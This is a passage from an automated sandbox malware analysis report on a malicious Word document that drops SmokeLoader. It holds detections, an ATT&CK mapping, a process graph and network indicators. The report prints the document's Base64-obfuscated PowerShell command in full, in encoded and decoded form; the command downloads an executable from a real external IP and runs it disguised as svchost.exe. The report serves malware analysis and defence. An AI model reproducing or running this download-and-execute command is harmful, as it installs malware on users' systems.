        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3147Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 459Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1290Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4270Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 288Thread sleep count: 3147 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 288Thread sleep count: 459 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3080Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2424Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep count: 1290 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep count: 4270 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156Thread sleep time: -60000s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3096Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 7_2_0022092B mov eax, dword ptr fs:[00000030h]7_2_0022092B
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 7_2_00220D90 mov eax, dword ptr fs:[00000030h]7_2_00220D90
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 7_2_0244B7E8 push dword ptr fs:[00000030h]7_2_0244B7E8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Yara detected Powershell download and execute
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1432, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3084, type: MEMORYSTR
        Encrypted powershell cmdline option found
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded $Web = New-Object System.Net.WebClient; $Url = 'http://45.84.0.173/download_22/server.exe'; $Pth = "$env:Temp\svchost.exe"; $Web.DownloadFile($Url, $Pth); Invoke-Expression $Pth;
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Base64 decoded $Web = New-Object System.Net.WebClient; $Url = 'http://45.84.0.173/download_22/server.exe'; $Pth = "$env:Temp\svchost.exe"; $Web.DownloadFile($Url, $Pth); Invoke-Expression $Pth;Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -C $B = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('JFdlYiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7ICRVcmwgPSAnaHR0cDovLzQ1Ljg0LjAuMTczL2Rvd25sb2FkXzIyL3NlcnZlci5leGUnOyAkUHRoID0gIiRlbnY6VGVtcFxzdmNob3N0LmV4ZSI7ICRXZWIuRG93bmxvYWRGaWxlKCRVcmwsICRQdGgpOyBJbnZva2UtRXhwcmVzc2lvbiAkUHRoOw==')); $C = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($B)); powershell -E $C;Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E JABXAGUAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAFUAcgBsACAAPQAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA4ADQALgAwAC4AMQA3ADMALwBkAG8AdwBuAGwAbwBhAGQAXwAyADIALwBzAGUAcgB2AGUAcgAuAGUAeABlACcAOwAgACQAUAB0AGgAIAA9ACAAIgAkAGUAbgB2ADoAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAiADsAIAAkAFcAZQBiAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFUAcgBsACwAIAAkAFAAdABoACkAOwAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgACQAUAB0AGgAOwA=Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c $b = [text.encoding]::utf8.getstring([convert]::frombase64string('jfdlyia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7icrvcmwgpsanahr0cdovlzq1ljg0ljaumtczl2rvd25sb2fkxziyl3nlcnzlci5legunoyakuhroid0giirlbny6vgvtcfxzdmnob3n0lmv4zsi7icrxzwiurg93bmxvywrgawxlkcrvcmwsicrqdggpoybjbnzva2utrxhwcmvzc2lvbiakuhroow==')); $c = [convert]::tobase64string([text.encoding]::unicode.getbytes($b)); powershell -e $c;
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -e jabxaguaygagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0adsaiaakafuacgbsacaapqagaccaaab0ahqacaa6ac8alwa0adualga4adqalgawac4amqa3admalwbkag8adwbuagwabwbhagqaxwayadialwbzaguacgb2aguacgauaguaeablaccaowagacqauab0aggaiaa9acaaigakaguabgb2adoavablag0acabcahmadgbjaggabwbzahqalgblahgazqaiadsaiaakafcazqbiac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaakafuacgbsacwaiaakafaadaboackaowagaekabgb2ag8aawblac0arqb4ahaacgblahmacwbpag8abgagacqauab0aggaowa=
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -c $b = [text.encoding]::utf8.getstring([convert]::frombase64string('jfdlyia9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7icrvcmwgpsanahr0cdovlzq1ljg0ljaumtczl2rvd25sb2fkxziyl3nlcnzlci5legunoyakuhroid0giirlbny6vgvtcfxzdmnob3n0lmv4zsi7icrxzwiurg93bmxvywrgawxlkcrvcmwsicrqdggpoybjbnzva2utrxhwcmvzc2lvbiakuhroow==')); $c = [convert]::tobase64string([text.encoding]::unicode.getbytes($b)); powershell -e $c;Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -e jabxaguaygagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algboaguadaauafcazqbiaemababpaguabgb0adsaiaakafuacgbsacaapqagaccaaab0ahqacaa6ac8alwa0adualga4adqalgawac4amqa3admalwbkag8adwbuagwabwbhagqaxwayadialwbzaguacgb2aguacgauaguaeablaccaowagacqauab0aggaiaa9acaaigakaguabgb2adoavablag0acabcahmadgbjaggabwbzahqalgblahgazqaiadsaiaakafcazqbiac4arabvahcabgbsag8ayqbkaeyaaqbsaguakaakafuacgbsacwaiaakafaadaboackaowagaekabgb2ag8aawblac0arqb4ahaacgblahmacwbpag8abgagacqauab0aggaowa=Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\svchost.exeCode function: 7_2_0040512A GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,7_2_0040512A

        Stealing of Sensitive Information

        barindex
        Yara detected SmokeLoader
        Source: Yara matchFile source: 7.2.svchost.exe.220e67.0.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality

        barindex
        Yara detected SmokeLoader
        Source: Yara matchFile source: 7.2.svchost.exe.220e67.0.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information22
        Scripting        		Valid Accounts111
        Command and Scripting Interpreter        		22
        Scripting        		11
        Process Injection        		11
        Masquerading        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		1
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts12
        Exploitation for Client Execution        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		21
        Virtualization/Sandbox Evasion        		LSASS Memory1
        Security Software Discovery        		Remote Desktop ProtocolData from Removable Media12
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts3
        PowerShell        		Logon Script (Windows)Logon Script (Windows)11
        Process Injection        		Security Account Manager21
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Deobfuscate/Decode Files or Information        		NTDS2
        Process Discovery        		Distributed Component Object ModelInput Capture11
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Obfuscated Files or Information        		LSA Secrets1
        Application Window Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain Credentials1
        File and Directory Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync13
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 1446716 Sample: 472.rtf.doc Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 40 Malicious sample detected (through community Yara rule) 2->40 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected SmokeLoader 2->44 46 14 other signatures 2->46 9 WINWORD.EXE 303 24 2->9         started        process3 file4 30 C:\Users\user\...\~DFF8D2936508DC487F.TMP, Composite 9->30 dropped 52 Suspicious command line found 9->52 13 cmd.exe 9->13         started        signatures5 process6 signatures7 54 Suspicious powershell command line found 13->54 56 Encrypted powershell cmdline option found 13->56 16 powershell.exe 4 13->16         started        19 timeout.exe 13->19         started        process8 signatures9 34 Encrypted powershell cmdline option found 16->34 36 Drops PE files with benign system names 16->36 38 Powershell drops PE file 16->38 21 powershell.exe 12 6 16->21         started        process10 dnsIp11 32 45.84.0.173, 49161, 80 ALEXHOSTMD Russian Federation 21->32 28 C:\Users\user\AppData\Local\...\svchost.exe, PE32 21->28 dropped 25 svchost.exe 21->25         started        file12 process13 signatures14 48 Antivirus detection for dropped file 25->48 50 Multi AV Scanner detection for dropped file 25->50

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        472.rtf.doc26%ReversingLabsDocument-Word.Infostealer.Heuristic
        472.rtf.doc100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\svchost.exe100%AviraTR/Crypt.Agent.mvien
        C:\Users\user\AppData\Local\Temp\~DFF8D2936508DC487F.TMP100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\svchost.exe92%ReversingLabsWin32.Trojan.Smokeloader

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://nuget.org/NuGet.exe0%URL Reputationsafe
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
        http://go.micros0%URL Reputationsafe
        https://contoso.com/0%URL Reputationsafe
        https://nuget.org/nuget.exe0%URL Reputationsafe
        https://contoso.com/License0%URL Reputationsafe
        https://contoso.com/Icon0%URL Reputationsafe
        http://45.84.0.1730%Avira URL Cloudsafe
        http://45.84.0.173/download_22/server.exe0%Avira URL Cloudsafe
        http://go.cr0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://45.84.0.173/download_22/server.exefalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.362102423.0000000002451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002531000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://45.84.0.173powershell.exe, 00000006.00000002.358011203.0000000002936000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358011203.0000000002929000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://go.microspowershell.exe, 00000006.00000002.358011203.00000000038BE000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://go.crpowershell.exe, 00000006.00000002.357966848.000000000247E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://contoso.com/powershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://contoso.com/Licensepowershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://contoso.com/Iconpowershell.exe, 00000006.00000002.360116556.0000000012561000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        45.84.0.173
        		unknownRussian Federation
        		200019ALEXHOSTMDfalse

        General Information

        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1446716
        Start date and time:2024-05-23 20:14:16 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 7s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:8
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • GSI enabled (VBA)
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name: 472.rtf.doc
        renamed because original name is a hash value
        Original Sample Name: 472.rtf.doc
        Detection:MAL
        Classification:mal100.troj.expl.evad.winDOC@11/17@0/1
        EGA Information:
        • Successful, ratio: 50%
        HCA Information:Failed
        Cookbook Comments:
        • Found application associated with file extension: .doc
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer
        • Stop behavior analysis, all processes terminated

        Warnings

        • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
        • Execution Graph export aborted for target powershell.exe, PID 3084 because it is empty
        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: 472.rtf.doc

        Simulations

        Behavior and APIs

        TimeTypeDescription
        14:15:06API Interceptor80x Sleep call for process: powershell.exe modified

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASNs

